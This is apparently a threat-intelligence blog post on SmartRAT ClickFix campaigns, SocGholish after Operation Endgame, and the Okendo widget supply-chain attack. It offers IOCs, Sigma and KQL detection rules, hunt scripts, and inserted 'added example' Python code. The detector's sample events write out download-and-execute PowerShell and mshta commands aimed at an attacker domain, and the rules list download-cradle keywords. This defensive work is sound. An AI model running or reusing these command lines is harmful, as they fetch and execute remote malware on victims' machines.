
Operation Endgame Aftermath & SmartRAT ClickFix Surge: OTX Pulse Analysis

Security Arsenal Team
June 20, 2026

The latest OTX pulses reveal a significant shift in the threat landscape following the Operation Endgame takedown. While law enforcement successfully disrupted the TA569 (GOLD PRELUDE) SocGholish infrastructure—taking down 106 servers and remediating 15,000 compromised WordPress sites—adversaries are rapidly pivoting to new tactics.

Threat actors are now leveraging AI-generated typosquatting (e.g., impersonating Brazilian banks) to deliver SmartRAT via ClickFix campaigns (fake CAPTCHA/BSOD screens). Concurrently, a supply chain attack targeting the Okendo Reviews widget highlights the risk of trusted third-party JavaScript being weaponized to deliver Remcos and StealC. Despite the disruption of legacy loaders like SocGholish, the ecosystem remains active with LummaC2, Vidar, and AgentTesla continuing to flood the market via cracked software distribution.

Threat Actor / Malware Profile

Adversaries:

  • TA569 (GOLD PRELUDE): Historically relied on "Fake Browser Update" prompts via compromised WordPress sites. Infrastructure severely degraded by Operation Endgame.
  • SmartApeSG: Active actor utilizing supply chain compromise (Okendo widget) to inject malicious JavaScript loaders.
  • Unknown Actor (Brazil Focus): Using AI site builders for typosquatting and ClickFix social engineering.

Key Malware Families:

  • SmartRAT: PowerShell-based banking trojan. Uses encrypted C2 and focuses on credential interception.
  • StealC / LummaC2 / Vidar: Information stealers targeting browser cookies, credentials, and crypto-wallets. Often distributed via S3 buckets and warez sites.
  • SocGholish: JScript-based malware loader (currently disrupted).

Attack Chain:

  1. Initial Access: Compromised WP sites (SocGholish), Malicious JS Injection (Okendo), or Typosquatting domains (SmartRAT).
  2. Social Engineering: Fake Browser Updates, Fake CAPTCHA/BSOD (ClickFix).
  3. Execution: Malicious JScript or PowerShell commands (often obfuscated).
  4. Payload Delivery: Download of RATs (SmartRAT, Remcos) or Stealers (LummaC2).
  5. Objective: Credential theft, financial fraud, and establishing foothold for ransomware (e.g., LockBit, WastedLocker).

IOC Analysis

The pulses provide a mix of infrastructure and payload indicators:

  • Hostnames/Domains: A large volume of compromised WordPress hostnames (SocGholish) and typosquatted domains (e.g., crefisa.online, windowsupdate-cdn.com). These should be blocked immediately at the perimeter.
  • URLs: Specific malicious endpoints used in the Okendo supply chain attack (api.wiggettcks.com). These indicate active C2 or loader servers.
  • File Hashes (MD5/SHA1/SHA256): Multiple hashes associated with SmartRAT, GhostLoader, and various stealers. These are critical for EDR correlation and scanning temp directories.
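Turning the domain indicators above into a resolver blocklist, as an added example that is not part of the original post. It emits a BIND Response Policy Zone in which attacker-registered domains are blocked with both an apex and a wildcard entry, while hostnames on compromised legitimate sites get an exact entry only, so the rest of the victim's site keeps resolving. The split of the page's indicators into those two lists is this example's reading of the article, and `rpz.local` is an assumed zone name.

```python
"""Added example: build a BIND RPZ zone from the pulse's domain IOCs.
Not code from the original post. The attacker/compromised split below is an
assumption about the article's indicators, and rpz.local is a placeholder."""
import re

# One DNS label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def normalize(name: str) -> str:
    return name.strip().lower().rstrip(".")


def valid_domain(name: str) -> bool:
    """Reject anything that is not a syntactically valid multi-label hostname,
    so a stray IP, URL or typo in the IOC feed cannot corrupt the zone."""
    name = normalize(name)
    labels = name.split(".")
    return len(labels) > 1 and len(name) <= 253 and all(LABEL_RE.match(l) for l in labels)


def rpz_records(attacker_domains, compromised_hosts):
    """Attacker-registered domains: apex + wildcard (CNAME . means NXDOMAIN).
    Compromised legitimate hosts: exact entry only, to limit collateral blocking."""
    rows = []
    for d in sorted({normalize(d) for d in attacker_domains if d.strip()}):
        if not valid_domain(d):
            raise ValueError(f"invalid domain in IOC list: {d!r}")
        rows.append(f"{d} CNAME .")
        rows.append(f"*.{d} CNAME .")
    for h in sorted({normalize(h) for h in compromised_hosts if h.strip()}):
        if not valid_domain(h):
            raise ValueError(f"invalid hostname in IOC list: {h!r}")
        rows.append(f"{h} CNAME .")
    return rows


def rpz_zone(attacker_domains, compromised_hosts, serial: int, origin: str = "rpz.local") -> str:
    """Complete zone file text: RPZ zones need a SOA and NS like any other zone."""
    header = [
        f"$ORIGIN {origin}.",
        "$TTL 60",
        f"@ IN SOA localhost. hostmaster.{origin}. {serial} 3600 900 604800 60",
        "@ IN NS localhost.",
    ]
    return "\n".join(header + rpz_records(attacker_domains, compromised_hosts)) + "\n"


# Indicators quoted from the article; the classification is this example's assumption.
ATTACKER_DOMAINS = ["crefisa.online", "windowsupdate-cdn.com", "wiggettcks.com", "wizzleticks.com"]
COMPROMISED_HOSTS = ["trademark.iglesiaelarca.com", "content.garretttrails.org", "promo.summat10n.org"]

if __name__ == "__main__":
    print(rpz_zone(ATTACKER_DOMAINS, COMPROMISED_HOSTS, serial=2026062001))
```

Load the output as a `response-policy` zone in `named.conf` and bump the serial on every feed update; resolvers ignore a zone whose serial did not change.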

Operational Guidance: SOC teams should push the hostnames to DNS firewall (RPZ) or Blokada rules, wildcarding attacker-registered domains but entering compromised legitimate hostnames exactly so the rest of the victim site keeps resolving. File hashes should be loaded into EDR isolation policies. The URLs point at live loader or C2 infrastructure; because such domains frequently sit behind shared hosting or CDN addresses, IP blocking alone is unreliable, so block on the TLS SNI or use TLS inspection so the HTTP path is visible.

Detection Engineering

The following detection logic targets the ClickFix PowerShell execution, the residual SocGholish fake update patterns, and the specific IOCs provided.

YAML
title: Potential ClickFix PowerShell Execution via Run Dialog or Browser
date: 2026/06/21
status: experimental
description: Detects suspicious PowerShell/cmd/mshta execution associated with ClickFix campaigns (fake BSOD/CAPTCHA). The pasted command usually runs from the Win+R Run dialog, so explorer.exe is the parent; browser parents cover the variant that launches the shell directly. The generic term "copy" was dropped because cmd /c copy is routine.
references:
    - https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
            - '\explorer.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
            - '\mshta.exe'
    selection_cmd:
        CommandLine|contains:
            - 'iex'
            - 'invoke-expression'
            - 'downloadstring'
            - 'invoke-restmethod'
            - 'frombase64string'
            - '-w hidden'
            - '-windowstyle hidden'
            - '-enc '
            - '-encodedcommand'
    condition: all of selection_*
falsepositives:
    - Administrators launching PowerShell from the Run dialog with download cmdlets
    - Scripts started from browser downloads that use -EncodedCommand
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1204.004
    - clickfix
---
title: SocGholish Fake Browser Update Pattern
date: 2026/06/21
status: experimental
description: Detects JScript files carrying an "update" name being written to the Downloads or Temp folder, the drop pattern of SocGholish Fake Browser Update lures (e.g. Update.js or Chrome.Update.js). Path, name fragment and extension are matched separately so "update" does not have to sit directly after the folder name.
references:
    - https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
    category: file_event
    product: windows
detection:
    selection_path:
        TargetFilename|contains:
            - '\Downloads\'
            - '\AppData\Local\Temp\'
    selection_name:
        TargetFilename|contains: 'update'
    selection_ext:
        TargetFilename|endswith:
            - '.js'
            - '.jse'
    condition: all of selection_*
falsepositives:
    - Legitimate software update downloads
level: medium
tags:
    - attack.initial_access
    - attack.t1189
    - attack.t1059.007
---
title: SmartRAT and Infostealer Hash Detection
date: 2026/06/21
status: experimental
description: Matches the MD5/SHA256 hashes observed in the ClickFix and May Infostealer pulses at process launch. Sysmon's FileCreate event (ID 11) does not carry hashes, so the rule is scoped to process_creation, where the Hashes field ("MD5=...,SHA256=...") is populated. Sigma string matching is case-insensitive, so lowercase values match Sysmon's uppercase output.
references:
    - https://otx.alienvault.com/pulse/627f3a2b8f5c1c4b6e9d1a2c
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Hashes|contains:
            - '297eb45f028d44d750297d2f932b9c91'
            - '3c72e1f37f115b00c3ad6ed31bacfe8a'
            - '6bf4d4c62b5138ace281ce3d08297787'
            - 'b17ccdb5531555e43f082d6e77c07227'
            - '0d1f6685b4e284f92ef25c0f9358bcdc'
            - '46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c'
    condition: selection
falsepositives:
    - None expected; a hash match is a confirmed known-bad binary
level: critical
tags:
    - attack.execution
    - attack.t1204.002


kql
// Hunt for ClickFix / SmartRAT / Okendo related network connections.
// Every indicator is matched against RemoteUrl: DeviceName is the local endpoint's
// hostname, so comparing C2 hostnames against it can never fire.
let iocDomains = dynamic(["wiggettcks.com", "wizzleticks.com", "crefisa.online", "windowsupdate-cdn.com",
    "trademark.iglesiaelarca.com", "content.garretttrails.org", "promo.summat10n.org"]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
// RemoteUrl is empty for connections without a DNS/SNI name; pair this with a DNS-log hunt for the same names.
| where RemoteUrl has_any (iocDomains)
| extend IOCPulse = "ClickFix_SmartRAT_Okendo"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort, IOCPulse


powershell
# IOC Hunt Script for SmartRAT and Infostealer Hashes
# The pulse lists five MD5 values and one SHA256; both are checked so the
# SHA256-only indicator is not silently skipped.
$TargetMD5 = @(
    "297eb45f028d44d750297d2f932b9c91",
    "3c72e1f37f115b00c3ad6ed31bacfe8a",
    "6bf4d4c62b5138ace281ce3d08297787",
    "b17ccdb5531555e43f082d6e77c07227",
    "0d1f6685b4e284f92ef25c0f9358bcdc"
)
$TargetSHA256 = @(
    "46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c"
)

$SearchPaths = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")

Write-Host "Scanning for Infostealer and SmartRAT IOCs..."

# Hits are collected as objects so the result can be piped to Export-Csv for the case file.
$Hits = foreach ($Path in $SearchPaths) {
    if (-not (Test-Path $Path)) { continue }
    # -File skips directories; -Force includes hidden/system files where droppers hide.
    Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -gt 0 -and $_.Length -lt 5MB } |
        ForEach-Object {
            # Locked or unreadable files return $null from Get-FileHash; skip them rather than throw.
            $MD5 = Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
            if (-not $MD5) { return }
            $Hit = $null
            if ($TargetMD5 -contains $MD5.Hash.ToLower()) {
                $Hit = $MD5.Hash.ToLower()
            } else {
                $SHA = Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
                if ($SHA -and $TargetSHA256 -contains $SHA.Hash.ToLower()) { $Hit = $SHA.Hash.ToLower() }
            }
            if ($Hit) {
                Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName) | Hash: $Hit" -ForegroundColor Red
                [pscustomobject]@{ Path = $_.FullName; Hash = $Hit; Modified = $_.LastWriteTime }
            }
        }
}

$Hits | Format-Table -AutoSize

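The ClickFix process-creation logic from the first Sigma rule, run over constructed sample events, as an added Python example that is not part of the original post. It shows two things the YAML alone does not: the Win+R Run dialog makes explorer.exe, not the browser, the parent of the pasted command, and lures routinely hide the `iex`/`DownloadString` strings inside `-EncodedCommand`, so the command line has to be base64/UTF-16LE decoded before keyword matching. The events are constructed, not real telemetry; `windowsupdate-cdn.com` is an indicator from the article, `example.invalid` is a placeholder, and the `RecordId` field is an assumed event key.

```python
"""Added example: ClickFix detection over Sysmon-style process-creation events.
Not code from the original post; sample events are constructed and
example.invalid is a placeholder domain."""
import base64
import json
import re

# Parent/child/keyword sets mirror the Sigma rule, extended with explorer.exe
# (the Win+R Run dialog) and mshta.exe, both routinely used by ClickFix lures.
PARENTS = ("\\chrome.exe", "\\msedge.exe", "\\firefox.exe", "\\explorer.exe")
CHILDREN = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\mshta.exe")
KEYWORDS = ("iex", "invoke-expression", "downloadstring", "invoke-restmethod",
            "frombase64string", "-w hidden", "-windowstyle hidden")
ENC_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decoded_commandline(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    keyword match sees what PowerShell will actually execute."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd  # not valid base64/UTF-16: fall back to the raw command line


def is_clickfix(event: dict) -> bool:
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    if not (parent.endswith(PARENTS) and image.endswith(CHILDREN)):
        return False
    cmd = decoded_commandline(event.get("CommandLine", "")).lower()
    if image.endswith("\\mshta.exe"):
        return "http" in cmd  # mshta fetching a remote .hta is the whole lure
    return any(k in cmd for k in KEYWORDS)


def detected_ids(log_text: str) -> list:
    """Run the check over newline-delimited JSON events; return matching RecordIds."""
    events = (json.loads(line) for line in log_text.splitlines() if line.strip())
    return [e["RecordId"] for e in events if is_clickfix(e)]


# Constructed sample events. Event 1 hides the download cascade inside -enc,
# event 4 is the benign "cmd /c copy" the original rule would have flagged.
ENC = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('https://windowsupdate-cdn.com/x')".encode("utf-16-le")
).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"RecordId": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": f"powershell -enc {ENC}"},
    {"RecordId": 2, "ParentImage": CHROME, "Image": PS,
     "CommandLine": "powershell -w hidden -c \"iex (irm https://example.invalid/captcha)\""},
    {"RecordId": 3, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"RecordId": 4, "ParentImage": CHROME, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c copy C:\\Users\\a\\Downloads\\report.pdf D:\\"},
    {"RecordId": 5, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
])

if __name__ == "__main__":
    print("ClickFix hits:", detected_ids(SAMPLE_LOG))  # [1, 2, 5]
```

The same decoding step belongs in the SIEM: a rule that only inspects the raw `CommandLine` field sees nothing but base64 for the most common ClickFix variant.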
Response Priorities

Immediate (0-4 hours):

  • Block IOCs: Implement immediate DNS blocking for all listed hostnames and domains (e.g., *.windowsupdate-cdn.com, *.wiggettcks.com).
  • Hunt Execution: Run the PowerShell hunt script on endpoints to check for the presence of the specific MD5 hashes associated with SmartRAT.

24 Hours:

  • Credential Audit: Given the prevalence of StealC and LummaC2, initiate forced password resets for privileged accounts and, because stealers export session cookies and tokens that survive a password change, revoke active sessions and refresh tokens for affected users; monitor for logins from GeoIPs or ASNs outside normal business operations.
  • Supply Chain Review: Investigate if the Okendo Reviews widget is present in the e-commerce environment. If so, inspect the loaded JavaScript against the provided IOCs.

1 Week:

  • Endpoint Hardening: Via GPO, reassociate .js/.jse/.hta with Notepad (or disable Windows Script Host through HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled = 0) so a double-clicked "update" file cannot run, and consider removing the Run dialog on user workstations (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu"), since ClickFix depends on pasting into Win+R. Browsers cannot tell "unsigned" JavaScript from any other, so user awareness of fake update and fake CAPTCHA prompts remains the control in the browser itself.
  • Architecture Review: Assess the reliance on third-party marketing widgets and implement strict Subresource Integrity (SRI) checks where possible.
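Subresource Integrity pinning for a third-party widget, as an added example that is not part of the original post and not Okendo's code. It generates the `integrity` value and the tag to ship, then checks a fetched body the way a browser does (strongest listed algorithm wins, any matching digest of that algorithm passes), against a clean copy and against one with an injected loader. The widget body is a constructed stand-in; `cdn.example.invalid` is a placeholder, and `api.wiggettcks.com` is the URL the article lists.

```python
"""Added example: SRI generation and verification for a third-party script.
Not the page's or any vendor's code; the widget bodies are constructed."""
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")  # strongest last, as browsers rank them


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity metadata for a script body: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


def script_tag(src: str, body: bytes) -> str:
    """The tag to ship; crossorigin is required for SRI on a cross-origin script."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def sri_matches(body: bytes, integrity: str) -> bool:
    """Browser semantics: keep the tokens using the strongest algorithm present,
    pass if any one of them matches. Unlike a browser, which loads the resource
    unchecked when no token is parseable, this deployment check fails closed."""
    parsed = []
    for token in integrity.split():
        algo, _, digest = token.partition("-")
        if algo in SRI_ALGOS and digest:
            parsed.append((SRI_ALGOS.index(algo), algo, digest))
    if not parsed:
        return False
    strongest = max(rank for rank, _, _ in parsed)
    return any(sri_hash(body, algo) == f"{algo}-{digest}"
               for rank, algo, digest in parsed if rank == strongest)


# Constructed stand-in for a reviews widget, and the same file with an injected
# loader pointing at the URL the article lists for the Okendo compromise.
WIDGET_V1 = b"/* reviews widget v1 */ window.reviewsWidget = function () { /* render */ };"
WIDGET_TAMPERED = WIDGET_V1 + b"\n/* injected */ (new Image).src='https://api.wiggettcks.com/';"
PIN = sri_hash(WIDGET_V1)

if __name__ == "__main__":
    print(script_tag("https://cdn.example.invalid/reviews-widget-1.0.0.js", WIDGET_V1))
    print("clean:", sri_matches(WIDGET_V1, PIN), "tampered:", sri_matches(WIDGET_TAMPERED, PIN))
```

SRI only works against a version-pinned, static URL: a vendor loader that is redeployed in place will fail closed on every vendor release, which is the intended behaviour but needs an owner who re-pins. It also covers nothing the widget fetches at runtime; those second-stage loads need a Content Security Policy that whitelists the vendor's hosts, which is exactly the kind of unexpected host (api.wiggettcks.com) that a policy report would have surfaced.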
